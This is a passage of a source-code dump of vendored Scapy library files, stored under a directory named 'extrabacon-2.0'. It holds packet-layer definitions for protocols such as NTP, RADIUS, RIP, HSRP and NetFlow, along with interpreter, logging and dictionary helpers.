http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | from packet import * 7 | 8 | class ASN1_Packet(Packet): 9 | ASN1_root = None 10 | ASN1_codec = None 11 | def init_fields(self): 12 | flist = self.ASN1_root.get_fields_list() 13 | self.do_init_fields(flist) 14 | self.fields_desc = flist 15 | def do_build(self): 16 | return self.ASN1_root.build(self) 17 | def do_dissect(self, x): 18 | return self.ASN1_root.dissect(self, x) 19 | 20 | 21 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/autorun.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | import code,sys 7 | from config import conf 8 | from themes import * 9 | from error import Scapy_Exception 10 | from utils import tex_escape 11 | 12 | 13 | ######################### 14 | ##### Autorun stuff ##### 15 | ######################### 16 | 17 | class StopAutorun(Scapy_Exception): 18 | code_run = "" 19 | 20 | class ScapyAutorunInterpreter(code.InteractiveInterpreter): 21 | def __init__(self, *args, **kargs): 22 | code.InteractiveInterpreter.__init__(self, *args, **kargs) 23 | self.error = 0 24 | def showsyntaxerror(self, *args, **kargs): 25 | self.error = 1 26 | return code.InteractiveInterpreter.showsyntaxerror(self, *args, **kargs) 27 | def showtraceback(self, *args, **kargs): 28 | self.error = 1 29 | exc_type, exc_value, exc_tb = sys.exc_info() 30 | if isinstance(exc_value, StopAutorun): 31 | raise exc_value 32 | return code.InteractiveInterpreter.showtraceback(self, *args, **kargs) 33 | 34 | 35 | def autorun_commands(cmds,my_globals=None,verb=0): 36 | sv = conf.verb 37 | import __builtin__ 38 | try: 39 | try: 40 | if my_globals is None: 41 | my_globals = __import__("scapy.all").all.__dict__ 42 | conf.verb = verb 43 | interp = ScapyAutorunInterpreter(my_globals) 44 | cmd = "" 45 | cmds = cmds.splitlines() 46 | cmds.append("") # ensure we finish multiline commands 47 | cmds.reverse() 48 | __builtin__.__dict__["_"] = None 49 | while 1: 50 | if cmd: 51 | sys.stderr.write(sys.__dict__.get("ps2","... ")) 52 | else: 53 | sys.stderr.write(str(sys.__dict__.get("ps1",ColorPrompt()))) 54 | 55 | l = cmds.pop() 56 | print l 57 | cmd += "\n"+l 58 | if interp.runsource(cmd): 59 | continue 60 | if interp.error: 61 | return 0 62 | cmd = "" 63 | if len(cmds) <= 1: 64 | break 65 | except SystemExit: 66 | pass 67 | finally: 68 | conf.verb = sv 69 | return _ 70 | 71 | def autorun_get_interactive_session(cmds, **kargs): 72 | class StringWriter: 73 | def __init__(self): 74 | self.s = "" 75 | def write(self, x): 76 | self.s += x 77 | 78 | sw = StringWriter() 79 | sstdout,sstderr = sys.stdout,sys.stderr 80 | try: 81 | try: 82 | sys.stdout = sys.stderr = sw 83 | res = autorun_commands(cmds, **kargs) 84 | except StopAutorun,e: 85 | e.code_run = sw.s 86 | raise 87 | finally: 88 | sys.stdout,sys.stderr = sstdout,sstderr 89 | return sw.s,res 90 | 91 | def autorun_get_text_interactive_session(cmds, **kargs): 92 | ct = conf.color_theme 93 | try: 94 | conf.color_theme = NoTheme() 95 | s,res = autorun_get_interactive_session(cmds, **kargs) 96 | finally: 97 | conf.color_theme = ct 98 | return s,res 99 | 100 | def autorun_get_ansi_interactive_session(cmds, **kargs): 101 | ct = conf.color_theme 102 | try: 103 | conf.color_theme = DefaultTheme() 104 | s,res = autorun_get_interactive_session(cmds, **kargs) 105 | finally: 106 | conf.color_theme = ct 107 | return s,res 108 | 109 | def autorun_get_html_interactive_session(cmds, **kargs): 110 | ct = conf.color_theme 111 | to_html = lambda s: s.replace("<","<").replace(">",">").replace("#[#","<").replace("#]#",">") 112 | try: 113 | try: 114 | conf.color_theme = HTMLTheme2() 115 | s,res = autorun_get_interactive_session(cmds, **kargs) 116 | except StopAutorun,e: 117 | e.code_run = to_html(e.code_run) 118 | raise 119 | finally: 120 | conf.color_theme = ct 121 | 122 | return to_html(s),res 123 | 124 | def autorun_get_latex_interactive_session(cmds, **kargs): 125 | ct = conf.color_theme 126 | to_latex = lambda s: tex_escape(s).replace("@[@","{").replace("@]@","}").replace("@`@","\\") 127 | try: 128 | try: 129 | conf.color_theme = LatexTheme2() 130 | s,res = autorun_get_interactive_session(cmds, **kargs) 131 | except StopAutorun,e: 132 | e.code_run = to_latex(e.code_run) 133 | raise 134 | finally: 135 | conf.color_theme = ct 136 | return to_latex(s),res 137 | 138 | 139 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/crypto/__init__.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Arnaud Ebalard 4 | ## This program is published under a GPLv2 license 5 | 6 | __all__ = ["cert"] 7 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/dadict.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | from error import Scapy_Exception 7 | 8 | ############################### 9 | ## Direct Access dictionnary ## 10 | ############################### 11 | 12 | def fixname(x): 13 | if x and x[0] in "0123456789": 14 | x = "n_"+x 15 | return x.translate("________________________________________________0123456789_______ABCDEFGHIJKLMNOPQRSTUVWXYZ______abcdefghijklmnopqrstuvwxyz_____________________________________________________________________________________________________________________________________") 16 | 17 | 18 | class DADict_Exception(Scapy_Exception): 19 | pass 20 | 21 | class DADict: 22 | def __init__(self, _name="DADict", **kargs): 23 | self._name=_name 24 | self.__dict__.update(kargs) 25 | def fixname(self,val): 26 | return fixname(val) 27 | def __contains__(self, val): 28 | return val in self.__dict__ 29 | def __getitem__(self, attr): 30 | return getattr(self, attr) 31 | def __setitem__(self, attr, val): 32 | return setattr(self, self.fixname(attr), val) 33 | def __iter__(self): 34 | return iter(map(lambda (x,y):y,filter(lambda (x,y):x and x[0]!="_", self.__dict__.items()))) 35 | def _show(self): 36 | for k in self.__dict__.keys(): 37 | if k and k[0] != "_": 38 | print "%10s = %r" % (k,getattr(self,k)) 39 | def __repr__(self): 40 | return "<%s/ %s>" % (self._name," ".join(filter(lambda x:x and x[0]!="_",self.__dict__.keys()))) 41 | 42 | def _branch(self, br, uniq=0): 43 | if uniq and br._name in self: 44 | raise DADict_Exception("DADict: [%s] already branched in [%s]" % (br._name, self._name)) 45 | self[br._name] = br 46 | 47 | def _my_find(self, *args, **kargs): 48 | if args and self._name not in args: 49 | return False 50 | for k in kargs: 51 | if k not in self or self[k] != kargs[k]: 52 | return False 53 | return True 54 | 55 | def _find(self, *args, **kargs): 56 | return self._recurs_find((), *args, **kargs) 57 | def _recurs_find(self, path, *args, **kargs): 58 | if self in path: 59 | return None 60 | if self._my_find(*args, **kargs): 61 | return self 62 | for o in self: 63 | if isinstance(o, DADict): 64 | p = o._recurs_find(path+(self,), *args, **kargs) 65 | if p is not None: 66 | return p 67 | return None 68 | def _find_all(self, *args, **kargs): 69 | return self._recurs_find_all((), *args, **kargs) 70 | def _recurs_find_all(self, path, *args, **kargs): 71 | r = [] 72 | if self in path: 73 | return r 74 | if self._my_find(*args, **kargs): 75 | r.append(self) 76 | for o in self: 77 | if isinstance(o, DADict): 78 | p = o._recurs_find_all(path+(self,), *args, **kargs) 79 | r += p 80 | return r 81 | def keys(self): 82 | return filter(lambda x:x and x[0]!="_", self.__dict__.keys()) 83 | 84 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/error.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | 7 | ############################# 8 | ##### Logging subsystem ##### 9 | ############################# 10 | 11 | class Scapy_Exception(Exception): 12 | pass 13 | 14 | import logging,traceback,time 15 | 16 | class ScapyFreqFilter(logging.Filter): 17 | def __init__(self): 18 | logging.Filter.__init__(self) 19 | self.warning_table = {} 20 | def filter(self, record): 21 | from config import conf 22 | wt = conf.warning_threshold 23 | if wt > 0: 24 | stk = traceback.extract_stack() 25 | caller=None 26 | for f,l,n,c in stk: 27 | if n == 'warning': 28 | break 29 | caller = l 30 | tm,nb = self.warning_table.get(caller, (0,0)) 31 | ltm = time.time() 32 | if ltm-tm > wt: 33 | tm = ltm 34 | nb = 0 35 | else: 36 | if nb < 2: 37 | nb += 1 38 | if nb == 2: 39 | record.msg = "more "+record.msg 40 | else: 41 | return 0 42 | self.warning_table[caller] = (tm,nb) 43 | return 1 44 | 45 | log_scapy = logging.getLogger("scapy") 46 | console_handler = logging.StreamHandler() 47 | console_handler.setFormatter(logging.Formatter("%(levelname)s: %(message)s")) 48 | log_scapy.addHandler(console_handler) 49 | log_runtime = logging.getLogger("scapy.runtime") # logs at runtime 50 | log_runtime.addFilter(ScapyFreqFilter()) 51 | log_interactive = logging.getLogger("scapy.interactive") # logs in interactive functions 52 | log_loading = logging.getLogger("scapy.loading") # logs when loading scapy 53 | 54 | 55 | def warning(x): 56 | log_runtime.warning(x) 57 | 58 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/layers/__init__.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/layers/all.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | from scapy.config import conf 7 | from scapy.error import log_loading 8 | 9 | def _import_star(m): 10 | mod = __import__(m, globals(), locals()) 11 | for k,v in mod.__dict__.iteritems(): 12 | globals()[k] = v 13 | 14 | for _l in conf.load_layers: 15 | log_loading.debug("Loading layer %s" % _l) 16 | _import_star(_l) 17 | 18 | 19 | 20 | 21 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/layers/gprs.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | 7 | from scapy.fields import * 8 | from scapy.packet import * 9 | from scapy.layers.inet import IP 10 | 11 | class GPRS(Packet): 12 | name = "GPRSdummy" 13 | fields_desc = [ 14 | StrStopField("dummy","","\x65\x00\x00",1) 15 | ] 16 | 17 | 18 | bind_layers( GPRS, IP, ) 19 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/layers/hsrp.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | from scapy.fields import * 7 | from scapy.packet import * 8 | from scapy.layers.inet import UDP 9 | 10 | class HSRP(Packet): 11 | name = "HSRP" 12 | fields_desc = [ 13 | ByteField("version", 0), 14 | ByteEnumField("opcode", 0, { 0:"Hello"}), 15 | ByteEnumField("state", 16, { 16:"Active"}), 16 | ByteField("hellotime", 3), 17 | ByteField("holdtime", 10), 18 | ByteField("priority", 120), 19 | ByteField("group", 1), 20 | ByteField("reserved", 0), 21 | StrFixedLenField("auth","cisco",8), 22 | IPField("virtualIP","192.168.1.1") ] 23 | 24 | 25 | 26 | 27 | 28 | bind_layers( UDP, HSRP, dport=1985, sport=1985) 29 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/layers/ir.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | from scapy.packet import * 7 | from scapy.fields import * 8 | from scapy.layers.l2 import CookedLinux 9 | 10 | 11 | 12 | # IR 13 | 14 | class IrLAPHead(Packet): 15 | name = "IrDA Link Access Protocol Header" 16 | fields_desc = [ XBitField("Address", 0x7f, 7), 17 | BitEnumField("Type", 1, 1, {"Response":0, 18 | "Command":1})] 19 | 20 | class IrLAPCommand(Packet): 21 | name = "IrDA Link Access Protocol Command" 22 | fields_desc = [ XByteField("Control", 0), 23 | XByteField("Format identifier", 0), 24 | XIntField("Source address", 0), 25 | XIntField("Destination address", 0xffffffffL), 26 | XByteField("Discovery flags", 0x1), 27 | ByteEnumField("Slot number", 255, {"final":255}), 28 | XByteField("Version", 0)] 29 | 30 | 31 | class IrLMP(Packet): 32 | name = "IrDA Link Management Protocol" 33 | fields_desc = [ XShortField("Service hints", 0), 34 | XByteField("Character set", 0), 35 | StrField("Device name", "") ] 36 | 37 | 38 | bind_layers( CookedLinux, IrLAPHead, proto=23) 39 | bind_layers( IrLAPHead, IrLAPCommand, Type=1) 40 | bind_layers( IrLAPCommand, IrLMP, ) 41 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/layers/l2tp.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | import struct 7 | 8 | from scapy.packet import * 9 | from scapy.fields import * 10 | from scapy.layers.inet import UDP 11 | from scapy.layers.ppp import PPP 12 | 13 | class L2TP(Packet): 14 | fields_desc = [ ShortEnumField("pkt_type",2,{2:"data"}), 15 | ShortField("len", None), 16 | ShortField("tunnel_id", 0), 17 | ShortField("session_id", 0), 18 | ShortField("ns", 0), 19 | ShortField("nr", 0), 20 | ShortField("offset", 0) ] 21 | 22 | def post_build(self, pkt, pay): 23 | if self.len is None: 24 | l = len(pkt)+len(pay) 25 | pkt = pkt[:2]+struct.pack("!H", l)+pkt[4:] 26 | return pkt+pay 27 | 28 | 29 | bind_layers( UDP, L2TP, sport=1701, dport=1701) 30 | bind_layers( L2TP, PPP, ) 31 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/layers/llmnr.py: -------------------------------------------------------------------------------- 1 | from scapy.fields import * 2 | from scapy.packet import * 3 | from scapy.layers.inet import UDP 4 | from scapy.layers.dns import DNSQRField, DNSRRField, DNSRRCountField 5 | 6 | 7 | ############################################################################# 8 | ### LLMNR (RFC4795) ### 9 | ############################################################################# 10 | # LLMNR is based on the DNS packet format (RFC1035 Section 4) 11 | # RFC also envisions LLMNR over TCP. Like vista, we don't support it -- arno 12 | 13 | _LLMNR_IPv6_mcast_Addr = "FF02:0:0:0:0:0:1:3" 14 | _LLMNR_IPv4_mcast_addr = "224.0.0.252" 15 | 16 | class LLMNRQuery(Packet): 17 | name = "Link Local Multicast Node Resolution - Query" 18 | fields_desc = [ ShortField("id", 0), 19 | BitField("qr", 0, 1), 20 | BitEnumField("opcode", 0, 4, { 0:"QUERY" }), 21 | BitField("c", 0, 1), 22 | BitField("tc", 0, 2), 23 | BitField("z", 0, 4), 24 | BitEnumField("rcode", 0, 4, { 0:"ok" }), 25 | DNSRRCountField("qdcount", None, "qd"), 26 | DNSRRCountField("ancount", None, "an"), 27 | DNSRRCountField("nscount", None, "ns"), 28 | DNSRRCountField("arcount", None, "ar"), 29 | DNSQRField("qd", "qdcount"), 30 | DNSRRField("an", "ancount"), 31 | DNSRRField("ns", "nscount"), 32 | DNSRRField("ar", "arcount",0)] 33 | overload_fields = {UDP: {"sport": 5355, "dport": 5355 }} 34 | def hashret(self): 35 | return struct.pack("!H", self.id) 36 | 37 | class LLMNRResponse(LLMNRQuery): 38 | name = "Link Local Multicast Node Resolution - Response" 39 | qr = 1 40 | fields_desc = [] 41 | 42 | def answers(self, other): 43 | return (isinstance(other, LLMNRQuery) and 44 | self.id == other.id and 45 | self.qr == 1 and 46 | other.qr == 0) 47 | 48 | def _llmnr_dispatcher(x, *args, **kargs): 49 | cls = Raw 50 | if len(x) >= 3: 51 | if (ord(x[4]) & 0x80): # Response 52 | cls = LLMNRResponse 53 | else: # Query 54 | cls = LLMNRQuery 55 | return cls(x, *args, **kargs) 56 | 57 | bind_bottom_up(UDP, _llmnr_dispatcher, { "dport": 5355 }) 58 | bind_bottom_up(UDP, _llmnr_dispatcher, { "sport": 5355 }) 59 | 60 | # LLMNRQuery(id=RandShort(), qd=DNSQR(qname="vista."))) 61 | 62 | 63 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/layers/mgcp.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | from scapy.packet import * 7 | from scapy.fields import * 8 | from scapy.layers.inet import UDP 9 | 10 | class MGCP(Packet): 11 | name = "MGCP" 12 | longname = "Media Gateway Control Protocol" 13 | fields_desc = [ StrStopField("verb","AUEP"," ", -1), 14 | StrFixedLenField("sep1"," ",1), 15 | StrStopField("transaction_id","1234567"," ", -1), 16 | StrFixedLenField("sep2"," ",1), 17 | StrStopField("endpoint","dummy@dummy.net"," ", -1), 18 | StrFixedLenField("sep3"," ",1), 19 | StrStopField("version","MGCP 1.0 NCS 1.0","\x0a", -1), 20 | StrFixedLenField("sep4","\x0a",1), 21 | ] 22 | 23 | 24 | #class MGCP(Packet): 25 | # name = "MGCP" 26 | # longname = "Media Gateway Control Protocol" 27 | # fields_desc = [ ByteEnumField("type",0, ["request","response","others"]), 28 | # ByteField("code0",0), 29 | # ByteField("code1",0), 30 | # ByteField("code2",0), 31 | # ByteField("code3",0), 32 | # ByteField("code4",0), 33 | # IntField("trasid",0), 34 | # IntField("req_time",0), 35 | # ByteField("is_duplicate",0), 36 | # ByteField("req_available",0) ] 37 | # 38 | bind_layers( UDP, MGCP, dport=2727) 39 | bind_layers( UDP, MGCP, sport=2727) 40 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/layers/mobileip.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | from scapy.fields import * 7 | from scapy.packet import * 8 | from scapy.layers.inet import IP,UDP 9 | 10 | 11 | class MobileIP(Packet): 12 | name = "Mobile IP (RFC3344)" 13 | fields_desc = [ ByteEnumField("type", 1, {1:"RRQ", 3:"RRP"}) ] 14 | 15 | class MobileIPRRQ(Packet): 16 | name = "Mobile IP Registration Request (RFC3344)" 17 | fields_desc = [ XByteField("flags", 0), 18 | ShortField("lifetime", 180), 19 | IPField("homeaddr", "0.0.0.0"), 20 | IPField("haaddr", "0.0.0.0"), 21 | IPField("coaddr", "0.0.0.0"), 22 | LongField("id", 0), ] 23 | 24 | class MobileIPRRP(Packet): 25 | name = "Mobile IP Registration Reply (RFC3344)" 26 | fields_desc = [ ByteField("code", 0), 27 | ShortField("lifetime", 180), 28 | IPField("homeaddr", "0.0.0.0"), 29 | IPField("haaddr", "0.0.0.0"), 30 | LongField("id", 0), ] 31 | 32 | class MobileIPTunnelData(Packet): 33 | name = "Mobile IP Tunnel Data Message (RFC3519)" 34 | fields_desc = [ ByteField("nexthdr", 4), 35 | ShortField("res", 0) ] 36 | 37 | 38 | bind_layers( UDP, MobileIP, sport=434) 39 | bind_layers( UDP, MobileIP, dport=434) 40 | bind_layers( MobileIP, MobileIPRRQ, type=1) 41 | bind_layers( MobileIP, MobileIPRRP, type=3) 42 | bind_layers( MobileIP, MobileIPTunnelData, type=4) 43 | bind_layers( MobileIPTunnelData, IP, nexthdr=4) 44 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/layers/netflow.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | from scapy.fields import * 7 | from scapy.packet import * 8 | 9 | # Cisco Netflow Protocol version 1 10 | class NetflowHeader(Packet): 11 | name = "Netflow Header" 12 | fields_desc = [ ShortField("version", 1) ] 13 | 14 | class NetflowHeaderV1(Packet): 15 | name = "Netflow Header V1" 16 | fields_desc = [ ShortField("count", 0), 17 | IntField("sysUptime", 0), 18 | IntField("unixSecs", 0), 19 | IntField("unixNanoSeconds", 0) ] 20 | 21 | 22 | class NetflowRecordV1(Packet): 23 | name = "Netflow Record" 24 | fields_desc = [ IPField("ipsrc", "0.0.0.0"), 25 | IPField("ipdst", "0.0.0.0"), 26 | IPField("nexthop", "0.0.0.0"), 27 | ShortField("inputIfIndex", 0), 28 | ShortField("outpuIfIndex", 0), 29 | IntField("dpkts", 0), 30 | IntField("dbytes", 0), 31 | IntField("starttime", 0), 32 | IntField("endtime", 0), 33 | ShortField("srcport", 0), 34 | ShortField("dstport", 0), 35 | ShortField("padding", 0), 36 | ByteField("proto", 0), 37 | ByteField("tos", 0), 38 | IntField("padding1", 0), 39 | IntField("padding2", 0) ] 40 | 41 | 42 | bind_layers( NetflowHeader, NetflowHeaderV1, version=1) 43 | bind_layers( NetflowHeaderV1, NetflowRecordV1, ) 44 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/layers/ntp.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | import time 7 | from scapy.packet import * 8 | from scapy.fields import * 9 | from scapy.layers.inet import UDP 10 | 11 | 12 | # seconds between 01-01-1900 and 01-01-1970 13 | _NTP_BASETIME = 2208988800 14 | 15 | class TimeStampField(FixedPointField): 16 | def __init__(self, name, default): 17 | FixedPointField.__init__(self, name, default, 64, 32) 18 | 19 | def i2repr(self, pkt, val): 20 | if val is None: 21 | return "--" 22 | val = self.i2h(pkt,val) 23 | if val < _NTP_BASETIME: 24 | return val 25 | return time.strftime("%a, %d %b %Y %H:%M:%S +0000", time.gmtime(val-_NTP_BASETIME)) 26 | 27 | def any2i(self, pkt, val): 28 | if type(val) is str: 29 | return int(time.mktime(time.strptime(val))) + _NTP_BASETIME + 3600 # XXX 30 | return FixedPointField.any2i(self,pkt,val) 31 | 32 | def i2m(self, pkt, val): 33 | if val is None: 34 | val = FixedPointField.any2i(self, pkt, time.time()+_NTP_BASETIME) 35 | return FixedPointField.i2m(self, pkt, val) 36 | 37 | 38 | 39 | class NTP(Packet): 40 | # RFC 1769 41 | name = "NTP" 42 | fields_desc = [ 43 | BitEnumField('leap', 0, 2, 44 | { 0: 'nowarning', 45 | 1: 'longminute', 46 | 2: 'shortminute', 47 | 3: 'notsync'}), 48 | BitField('version', 3, 3), 49 | BitEnumField('mode', 3, 3, 50 | { 0: 'reserved', 51 | 1: 'sym_active', 52 | 2: 'sym_passive', 53 | 3: 'client', 54 | 4: 'server', 55 | 5: 'broadcast', 56 | 6: 'control', 57 | 7: 'private'}), 58 | BitField('stratum', 2, 8), 59 | BitField('poll', 0xa, 8), ### XXX : it's a signed int 60 | BitField('precision', 0, 8), ### XXX : it's a signed int 61 | FixedPointField('delay', 0, size=32, frac_bits=16), 62 | FixedPointField('dispersion', 0, size=32, frac_bits=16), 63 | IPField('id', "127.0.0.1"), 64 | TimeStampField('ref', 0), 65 | TimeStampField('orig', None), # None means current time 66 | TimeStampField('recv', 0), 67 | TimeStampField('sent', None) 68 | ] 69 | def mysummary(self): 70 | return self.sprintf("NTP v%ir,NTP.version%, %NTP.mode%") 71 | 72 | 73 | bind_layers( UDP, NTP, dport=123, sport=123) 74 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/layers/pflog.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | from scapy.packet import * 7 | from scapy.fields import * 8 | from scapy.layers.inet import IP 9 | if conf.ipv6_enabled: 10 | from scapy.layers.inet6 import IPv6 11 | from scapy.config import conf 12 | 13 | class PFLog(Packet): 14 | name = "PFLog" 15 | # from OpenBSD src/sys/net/pfvar.h and src/sys/net/if_pflog.h 16 | fields_desc = [ ByteField("hdrlen", 0), 17 | ByteEnumField("addrfamily", 2, {socket.AF_INET: "IPv4", 18 | socket.AF_INET6: "IPv6"}), 19 | ByteEnumField("action", 1, {0: "pass", 1: "drop", 20 | 2: "scrub", 3: "no-scrub", 21 | 4: "nat", 5: "no-nat", 22 | 6: "binat", 7: "no-binat", 23 | 8: "rdr", 9: "no-rdr", 24 | 10: "syn-proxy-drop" }), 25 | ByteEnumField("reason", 0, {0: "match", 1: "bad-offset", 26 | 2: "fragment", 3: "short", 27 | 4: "normalize", 5: "memory", 28 | 6: "bad-timestamp", 29 | 7: "congestion", 30 | 8: "ip-options", 31 | 9: "proto-cksum", 32 | 10: "state-mismatch", 33 | 11: "state-insert", 34 | 12: "state-limit", 35 | 13: "src-limit", 36 | 14: "syn-proxy" }), 37 | StrFixedLenField("iface", "", 16), 38 | StrFixedLenField("ruleset", "", 16), 39 | SignedIntField("rulenumber", 0), 40 | SignedIntField("subrulenumber", 0), 41 | SignedIntField("uid", 0), 42 | IntField("pid", 0), 43 | SignedIntField("ruleuid", 0), 44 | IntField("rulepid", 0), 45 | ByteEnumField("direction", 255, {0: "inout", 1: "in", 46 | 2:"out", 255: "unknown"}), 47 | StrFixedLenField("pad", "\x00\x00\x00", 3 ) ] 48 | def mysummary(self): 49 | return self.sprintf("%PFLog.addrfamily% %PFLog.action% on %PFLog.iface% by rule %PFLog.rulenumber%") 50 | 51 | bind_layers(PFLog, IP, addrfamily=socket.AF_INET) 52 | if conf.ipv6_enabled: 53 | bind_layers(PFLog, IPv6, addrfamily=socket.AF_INET6) 54 | 55 | conf.l2types.register(117, PFLog) 56 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/layers/radius.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | import struct 7 | from scapy.packet import * 8 | from scapy.fields import * 9 | 10 | class Radius(Packet): 11 | name = "Radius" 12 | fields_desc = [ ByteEnumField("code", 1, {1: "Access-Request", 13 | 2: "Access-Accept", 14 | 3: "Access-Reject", 15 | 4: "Accounting-Request", 16 | 5: "Accounting-Accept", 17 | 6: "Accounting-Status", 18 | 7: "Password-Request", 19 | 8: "Password-Ack", 20 | 9: "Password-Reject", 21 | 10: "Accounting-Message", 22 | 11: "Access-Challenge", 23 | 12: "Status-Server", 24 | 13: "Status-Client", 25 | 21: "Resource-Free-Request", 26 | 22: "Resource-Free-Response", 27 | 23: "Resource-Query-Request", 28 | 24: "Resource-Query-Response", 29 | 25: "Alternate-Resource-Reclaim-Request", 30 | 26: "NAS-Reboot-Request", 31 | 27: "NAS-Reboot-Response", 32 | 29: "Next-Passcode", 33 | 30: "New-Pin", 34 | 31: "Terminate-Session", 35 | 32: "Password-Expired", 36 | 33: "Event-Request", 37 | 34: "Event-Response", 38 | 40: "Disconnect-Request", 39 | 41: "Disconnect-ACK", 40 | 42: "Disconnect-NAK", 41 | 43: "CoA-Request", 42 | 44: "CoA-ACK", 43 | 45: "CoA-NAK", 44 | 50: "IP-Address-Allocate", 45 | 51: "IP-Address-Release", 46 | 253: "Experimental-use", 47 | 254: "Reserved", 48 | 255: "Reserved"} ), 49 | ByteField("id", 0), 50 | ShortField("len", None), 51 | StrFixedLenField("authenticator","",16) ] 52 | def post_build(self, p, pay): 53 | p += pay 54 | l = self.len 55 | if l is None: 56 | l = len(p) 57 | p = p[:2]+struct.pack("!H",l)+p[4:] 58 | return p 59 | 60 | 61 | 62 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/layers/rip.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | from scapy.packet import * 7 | from scapy.fields import * 8 | from scapy.layers.inet import UDP 9 | 10 | class RIP(Packet): 11 | name = "RIP header" 12 | fields_desc = [ 13 | ByteEnumField("cmd",1,{1:"req",2:"resp",3:"traceOn",4:"traceOff",5:"sun", 14 | 6:"trigReq",7:"trigResp",8:"trigAck",9:"updateReq", 15 | 10:"updateResp",11:"updateAck"}), 16 | ByteField("version",1), 17 | ShortField("null",0), 18 | ] 19 | 20 | class RIPEntry(Packet): 21 | name = "RIP entry" 22 | fields_desc = [ 23 | ShortEnumField("AF",2,{2:"IP"}), 24 | ShortField("RouteTag",0), 25 | IPField("addr","0.0.0.0"), 26 | IPField("mask","0.0.0.0"), 27 | IPField("nextHop","0.0.0.0"), 28 | IntEnumField("metric",1,{16:"Unreach"}), 29 | ] 30 | 31 | 32 | 33 | bind_layers( UDP, RIP, sport=520) 34 | bind_layers( UDP, RIP, dport=520) 35 | bind_layers( RIP, RIPEntry, ) 36 | bind_layers( RIPEntry, RIPEntry, ) 37 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/layers/rtp.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | from scapy.packet import * 7 | from scapy.fields import * 8 | 9 | _rtp_payload_types = { 10 | # http://www.iana.org/assignments/rtp-parameters 11 | 0: 'G.711 PCMU', 3: 'GSM', 12 | 4: 'G723', 5: 'DVI4', 13 | 6: 'DVI4', 